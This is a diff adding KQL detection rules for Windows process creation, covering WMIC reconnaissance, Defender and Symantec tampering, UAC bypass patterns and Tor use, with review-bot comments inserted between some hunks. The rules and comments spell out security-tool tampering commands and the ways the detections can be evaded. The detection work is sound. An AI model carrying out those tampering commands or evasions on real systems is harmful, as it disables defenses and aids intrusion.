index 00000000..19edcb23
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,12 @@
+// Title: System Disk And Volume Reconnaissance Via Wmic.EXE
+// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ)
+// Date: 2024-02-02
+// Level: medium
+// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
+// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
+// observed being used by threat actors such as Volt Typhoon.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " volumename" or ProcessCommandLine contains " logicaldisk") or (ProcessCommandLine contains "path" and ProcessCommandLine contains "win32_logicaldisk") or (ProcessCommandLine contains " volume" and ProcessCommandLine contains " list ")) and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql
new file mode 100644
index 00000000..3f7329a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: System File Execution Location Anomaly
+// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2017-11-27
+// Level: high
+// Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith 
"\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\werfaultsecure.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or FolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and FolderPath endswith "\\pwsh.exe") or (FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\" and FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Users\\'") or (FolderPath endswith "\\wsl.exe" and (FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux" or FolderPath startswith "C:\\Program Files\\WSL\\"))))) and (not(FolderPath contains "\\SystemRoot\\System32\\")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql new file mode 100644 index 00000000..e060abbd --- /dev/null 
+++ b/KQL/rules/windows/process_creation/system_information_discovery_via_registry_queries.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery via Registry Queries
+// Author: lazarg
+// Date: 2025-06-12
+// Level: low
+// Description: Detects attempts to query system information directly from the Windows Registry.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql
new file mode 100644
index 00000000..03433c29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/system_network_connections_discovery_via_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: System Network Connections Discovery Via Net.EXE
+// Author: frack113
+// Date: 2021-12-10
+// Level: low
+// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql b/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql
new file mode 100644
index 00000000..b6835f6a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/tamper_windows_defender_remove_mppreference.kql
@@ -0,0 +1,12 @@
+// Title: Tamper Windows Defender Remove-MpPreference
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate PowerShell scripts
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
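Review bot: In the Remove-MpPreference hunk the four parameter matches require the full parameter name followed by a space, so `-AttackSurfaceReductionRules_Ids:<guid>` (colon binding) or a shortened parameter name is not matched; PowerShell binds any unambiguous prefix, e.g. `-AttackSurfaceReductionRules_I`. Dropping the trailing space and matching on the shortest distinguishing prefix keeps the rule's intent while closing that gap, e.g. `ProcessCommandLine contains "-AttackSurfaceReductionRules_"` (covers both `_Ids` and `_Actions`), `ProcessCommandLine contains "-ControlledFolderAccessP"` and `ProcessCommandLine contains "-CheckForSignaturesBefore"`. As this file is converter output, the change belongs upstream in the Sigma rule or in a converter post-processing step rather than as a hand edit here.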
diff --git a/KQL/rules/windows/process_creation/tap_installer_execution.kql b/KQL/rules/windows/process_creation/tap_installer_execution.kql
new file mode 100644
index 00000000..aeabdbf9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/tap_installer_execution.kql
@@ -0,0 +1,12 @@
+// Title: Tap Installer Execution
+// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+// False Positives:
+// - Legitimate OpenVPN TAP installation
+
+DeviceProcessEvents
+| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql b/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql
new file mode 100644
index 00000000..6d768a6a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/taskkill_symantec_endpoint_protection.kql
@@ -0,0 +1,12 @@
+// Title: Taskkill Symantec Endpoint Protection
+// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
+// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
+// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql b/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql
new file mode 100644
index 00000000..983a3725
--- /dev/null
+++ b/KQL/rules/windows/process_creation/taskmgr_as_local_system.kql
@@ -0,0 +1,10 @@
+// Title: Taskmgr as LOCAL_SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-18
+// Level: high
+// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tasks_folder_evasion.kql b/KQL/rules/windows/process_creation/tasks_folder_evasion.kql
new file mode 100644
index 00000000..45b379a0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/tasks_folder_evasion.kql
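Review bot: In the Taskkill Symantec hunk, `ProcessCommandLine contains " /F "` requires a space after the flag, so the exact invocation the description itself gives — `taskkill /im ccSvcHst.exe /f`, with `/f` last — is not matched because nothing follows the flag; the `-f`/`-im` spellings that taskkill also accepts are missed for the same reason. A regex keyed on the flag boundary closes both gaps: replace the two `contains` flag terms with `ProcessCommandLine matches regex @"(?i)\s[/-]f(\s|$)" and ProcessCommandLine matches regex @"(?i)\s[/-]im\s"`, keeping the `taskkill` and `ccSvcHst.exe` checks as they are.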
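Review bot: In the Taskmgr as LOCAL_SYSTEM hunk, `AccountName contains "AUTHORI"` / `"AUTORI"` maps Sigma's `User` field (`DOMAIN\user`) onto a column that in DeviceProcessEvents carries only the user part — a SYSTEM launch shows `AccountName` as `system` with `NT AUTHORITY` in `AccountDomain`, so this high-severity rule would never fire as written. The robust test is the well-known SID: `| where FolderPath endswith "\\taskmgr.exe" and AccountSid =~ "S-1-5-18"`, optionally keeping `AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI"` for localized domain names. This looks like a systematic `User` → `AccountName` mapping in the converter, so any other generated rule keyed on the user field presumably needs the same review.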
@@ -0,0 +1,12 @@
+// Title: Tasks Folder Evasion
+// Author: Sreeman
+// Date: 2020-01-13
+// Level: high
+// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
+// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
+// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql b/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql
new file mode 100644
index 00000000..1c04ad35
--- /dev/null
+++ b/KQL/rules/windows/process_creation/terminal_service_process_spawn.kql
@@ -0,0 +1,10 @@
+// Title: Terminal Service Process Spawn
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-05-22
+// Level: high
+// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002
+
+DeviceProcessEvents
+| where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql b/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql
new file mode 100644
index 00000000..5bf2459b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/time_travel_debugging_utility_usage.kql
@@ -0,0 +1,12 @@
+// Title: Time Travel Debugging Utility Usage
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+// - Legitimate usage by software developers/testers
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/tor_client_browser_execution.kql b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql
new file mode 100644
index 00000000..f4a77dd9
--- /dev/null
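Review bot: In the Terminal Service Process Spawn hunk, the `isnull(FolderPath)` term translates Sigma's `Image: null`, but DeviceProcessEvents reports an unresolved string column as an empty string rather than a null, so that branch of the exclusion never applies and such events would alert; `isempty(FolderPath)` is true for both null and `""` and is the form to use. Separately, the rule is keyed entirely on `InitiatingProcessCommandLine contains "termsvcs"`, which assumes the parent's command line is recorded for the event; a comment such as `// NOTE: relies on the parent command line being populated; verify in your tenant` would make that dependency explicit.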
+++ b/KQL/rules/windows/process_creation/tor_client_browser_execution.kql
@@ -0,0 +1,10 @@
+// Title: Tor Client/Browser Execution
+// Author: frack113
+// Date: 2022-02-20
+// Level: high
+// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.003
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "Tor Browser" or ProcessVersionInfoProductName =~ "Tor Browser" or (FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql b/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql
new file mode 100644
index 00000000..a79e662c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/trustedpath_uac_bypass_pattern.kql
@@ -0,0 +1,10 @@
+// Title: TrustedPath UAC Bypass Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-27
+// Level: critical
+// Description: Detects indicators of a UAC bypass method by mocking directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath contains "C:\\Windows \\System32\\" or FolderPath contains "C:\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql b/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql
new file mode 100644
index 00000000..6830eaf5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_abusing_winsat_path_parsing_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql b/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql
new file mode 100644
index 00000000..50fe22f4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_tools_using_computerdefaults.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Tools Using ComputerDefaults
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-31
+// Level: high
+// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql b/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql
new file mode 100644
index 00000000..ef418a7b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_changepk_and_slui.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using ChangePK and SLUI
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql
new file mode 100644
index 00000000..1fd6ae70
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_consent_and_comctl32_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Consent and Comctl32 - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql b/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql
new file mode 100644
index 00000000..38b2f383
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_disk_cleanup.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Disk Cleanup
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql b/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql
new file mode 100644
index 00000000..183dc613
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_dismhost.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using DismHost
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql b/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql
new file mode 100644
index 00000000..782dcbbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_event_viewer_recentviews.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Event Viewer RecentViews
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-22
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql
new file mode 100644
index 00000000..fc8d05a7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_idiagnostic_profile.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IDiagnostic Profile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql
new file mode 100644
index 00000000..1f5ee56e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_ieinstal_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IEInstal - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql
new file mode 100644
index 00000000..7e9d4006
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_msconfig_token_modification_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using MSConfig Token Modification - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql b/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql
new file mode 100644
index 00000000..a1dc464d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_ntfs_reparse_point_process.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using NTFS Reparse Point - Process
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql b/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql
new file mode 100644
index 00000000..07e62c6d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/uac_bypass_using_pkgmgr_and_dism.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using PkgMgr and DISM
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
